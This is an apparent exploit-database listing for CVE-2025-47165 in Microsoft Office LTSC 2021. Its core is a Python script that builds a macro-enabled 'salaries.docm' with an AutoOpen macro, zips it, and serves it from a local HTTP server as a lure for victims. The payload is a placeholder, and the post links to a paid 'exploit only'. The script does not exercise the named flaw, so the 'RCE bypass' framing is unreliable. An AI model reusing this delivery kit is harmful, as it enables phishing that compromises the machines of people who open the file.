📄 Microsoft Excel LTSC Professional Pilus 2021 Remote Code Execution

🗓️ 24 Jun 2025 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstorm.news👁 140 Views

High risk CVE-2025-47165 enables remote code execution in Excel LTSC 2021 via a malicious DOCM.

Reporter	Title	Published	Views	Family All 26
Circl	CVE-2025-47165	10 Jun 202515:24	–	circl
CNNVD	Microsoft Excel 资源管理错误漏洞	10 Jun 202500:00	–	cnnvd
CNVD	Microsoft Excel Code Execution Vulnerability (CNVD-2025-13266)	13 Jun 202500:00	–	cnvd
CVE	CVE-2025-47165	10 Jun 202517:02	–	cve
Cvelist	CVE-2025-47165 Microsoft Excel Remote Code Execution Vulnerability	10 Jun 202517:02	–	cvelist
Exploit DB	Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)	26 Jun 202500:00	–	exploitdb
EUVD	EUVD-2025-17734	3 Oct 202520:07	–	euvd
Microsoft KB	Description of the security update for Office Online Server: June 10, 2025 (KB5002728)	10 Jun 202507:00	–	mskb
Microsoft KB	Description of the security update for Excel 2016: June 10, 2025 (KB5002735)	10 Jun 202507:00	–	mskb
Kaspersky	KLA84759 Multiple vulnerabilities in Microsoft Office	10 Jun 202500:00	–	kaspersky

# Titles: Microsoft Excel LTSC Professional Pilus 2021 - Microsoft® Word
    LTSC MSO (16.0.14334.20090) 64-bit - Remote Code Execution Bypass - ZIP
    (RCE)
    # Author: nu11secur1ty
    # Date: 06/24/2025
    # Vendor: Microsoft
    # Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
    # Reference:
    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
    # CVE-2025-47165
    # Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
    Microsoft 365 Apps for Enterprise
    
    ## Description:
    The attacker can trick any user into opening and executing their code by
    sending a malicious DOCM file via email or a streaming server. After the
    execution of the victim, his machine can be infected or even worse than
    ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
    MACROS OPTIONS FROM YOUR OFFICE 365!!!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    
    ```
    #!/usr/bin/python
    # CVE-2025-47165
    # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
    # by nu11secur1ty
    import os
    import sys
    import pythoncom
    from win32com.client import Dispatch
    import http.server
    import socketserver
    import socket
    import threading
    import zipfile
    
    PORT = 8000
    DOCM_FILENAME = "salaries.docm"
    ZIP_FILENAME = "salaries.zip"
    DIRECTORY = "."
    
    def create_docm_with_macro(filename=DOCM_FILENAME):
        pythoncom.CoInitialize()
        word = Dispatch("Word.Application")
        word.Visible = False
    
        try:
            doc = word.Documents.Add()
            vb_project = doc.VBProject
            vb_component = vb_project.VBComponents("ThisDocument")
    
            macro_code = '''
    Sub AutoOpen()
          //YOUR EXPLOIT HERE
          // All OF YPU PLEASE WATCH THE DEMO VIDEO
          // Best Regards to packetstorm.news and OFFSEC
    End Sub
    '''
    
            vb_component.CodeModule.AddFromString(macro_code)
    
            doc.SaveAs(os.path.abspath(filename), FileFormat=13)
            print(f"[+] Macro-enabled Word document created: {filename}")
    
        except Exception as e:
            print(f"[!] Error creating document: {e}")
        finally:
            doc.Close(False)
            word.Quit()
            pythoncom.CoUninitialize()
    
    def zip_docm(docm_path, zip_path):
        with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
    as zipf:
            zipf.write(docm_path, arcname=os.path.basename(docm_path))
        print(f"[+] Created ZIP archive: {zip_path}")
    
    def get_local_ip():
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            ip = s.getsockname()[0]
        except Exception:
            ip = "127.0.0.1"
        finally:
            s.close()
        return ip
    
    class Handler(http.server.SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory=DIRECTORY, **kwargs)
    
    def run_server():
        ip = get_local_ip()
        print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
        print(f"[+] Place your macro docm and zip files in this directory to
    serve them.")
        print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
        with socketserver.TCPServer(("", PORT), Handler) as httpd:
            print("[+] Server running, press Ctrl+C to stop")
            httpd.serve_forever()
    
    if __name__ == "__main__":
        if os.name != "nt":
            print("[!] This script only runs on Windows with MS Word
    installed.")
            sys.exit(1)
    
        print("[*] Creating the macro-enabled document...")
        create_docm_with_macro(DOCM_FILENAME)
    
        print("[*] Creating ZIP archive of the document...")
        zip_docm(DOCM_FILENAME, ZIP_FILENAME)
    
        print("[*] Starting HTTP server in background thread...")
        server_thread = threading.Thread(target=run_server, daemon=True)
        server_thread.start()
    
        try:
            while True:
                pass  # Keep main thread alive
        except KeyboardInterrupt:
            print("\n[!] Server stopped by user.")
    
    
    ```
    
    # Reproduce:
    [href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
    
    # Buy an exploit only:
    [href](https://satoshidisk.com/pay/COiBVA)
    
    # Time spent:
    01:37:00

24 Jun 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.17.8

EPSS0.01015

SSVC